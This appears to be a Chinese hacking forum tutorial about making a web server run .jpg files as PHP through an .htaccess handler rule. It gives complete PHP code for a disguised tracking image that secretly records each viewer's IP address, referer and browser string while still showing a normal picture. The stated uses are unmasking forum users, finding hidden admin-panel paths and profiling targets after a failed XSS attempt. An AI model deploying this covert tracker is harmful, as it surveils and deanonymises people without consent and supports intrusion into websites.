是否有时候存在以下情况:
1.感觉目标站点存在XSS,但是XSS平台就是收不到货
2.找到后台密码却寻不着后台入口
3.想查看发帖人的IP地址。
那么可以尝试VK这招。(受虾米表哥的思路启发)
不用打开链接,只要打开了含有我的图片的网页就会中招。
0x01 正文
先看看效果
1.某人发起悬赏,要社工我,设置了仅楼主可见
2.回帖:
3.楼主发现回复:
4.这边已经收到信息:
原理及教程
原理是使用.htaccess,将jpg文件当作php文件来解析。
用php伪造一个图片,而内容则是获取目标ip、referer、UA信息
1.在自己VPS的jpg目录下创建.htaccess文件。
内容是:
AddHandler application/x-httpd-php .jpg
意思就是将jpg文件当作php文件来解析。
2.建立1.jpg,代码如下:
<?php function filter_dangerous_words($str){$str = str_replace("'", "‘", $str);$str = str_replace("\"", "“", $str);$str = str_replace("<", "《", $str);$str = str_replace(">", "》", $str);return $str;}function getIP() {if (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');}elseif (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');}elseif (getenv('HTTP_X_FORWARDED')) {$ip = getenv('HTTP_X_FORWARDED');}elseif (getenv('HTTP_FORWARDED_FOR')) {$ip = getenv('HTTP_FORWARDED_FOR');}elseif (getenv('HTTP_FORWARDED')) {$ip = getenv('HTTP_FORWARDED');}else {$ip = $_SERVER['REMOTE_ADDR'];}return $ip;}$ip = getIP();@$referer = $_SERVER['HTTP_REFERER']."\r\n";$ua = $_SERVER['HTTP_USER_AGENT']."\r\n\r\n";date_default_timezone_set("Asia/Shanghai");$date_ = date("Y.m.d,h:i:sa")."\r\n";//记录后台地址等信息$hack = 'date: '.$date_.'ip:'.$ip."\r\n".'referer: '.$referer.'ua: '.$ua;$hack = filter_dangerous_words($hack);$op = fopen('hack.txt','a+');fwrite($op,$hack);fclose($op);//伪装成图片$im = imagecreatefromjpeg("2.jpg");//注意该目录下,也要有2.jpg这个图片header('Content-Type: image/jpeg');imagejpeg($im);imagedestroy($im);?>
3.随便找个图片放进该目录下,命名为2.jpg
然后,别人访问该目录下的1.jpg,看上去是张图片,
但实际上隐私信息已经被我偷偷记录
适用场景
1.前言的三点
2.获取后台路径条件比较苛刻,首先得有个上传图片,后台管理员审阅的接口,其次这个接口允许外链图片,或者可以抓包更改成外链图片(虾米表哥总结是dede和yii可以)
3.目标站点有XSS,但是由于浏览器原因,xss没有生效,平台没有收到货,可以用此法查看对方的浏览器信息。
,PHP就没有浏览器限制,可以先了解对方的浏览器信息,来具体问题具体分析
4.大家集思广益吧,能放外链图片的地方都能用得着。
0x02 相关问题解决办法
1.htaccess不生效
2.访问图片,依旧没有生成hack.txt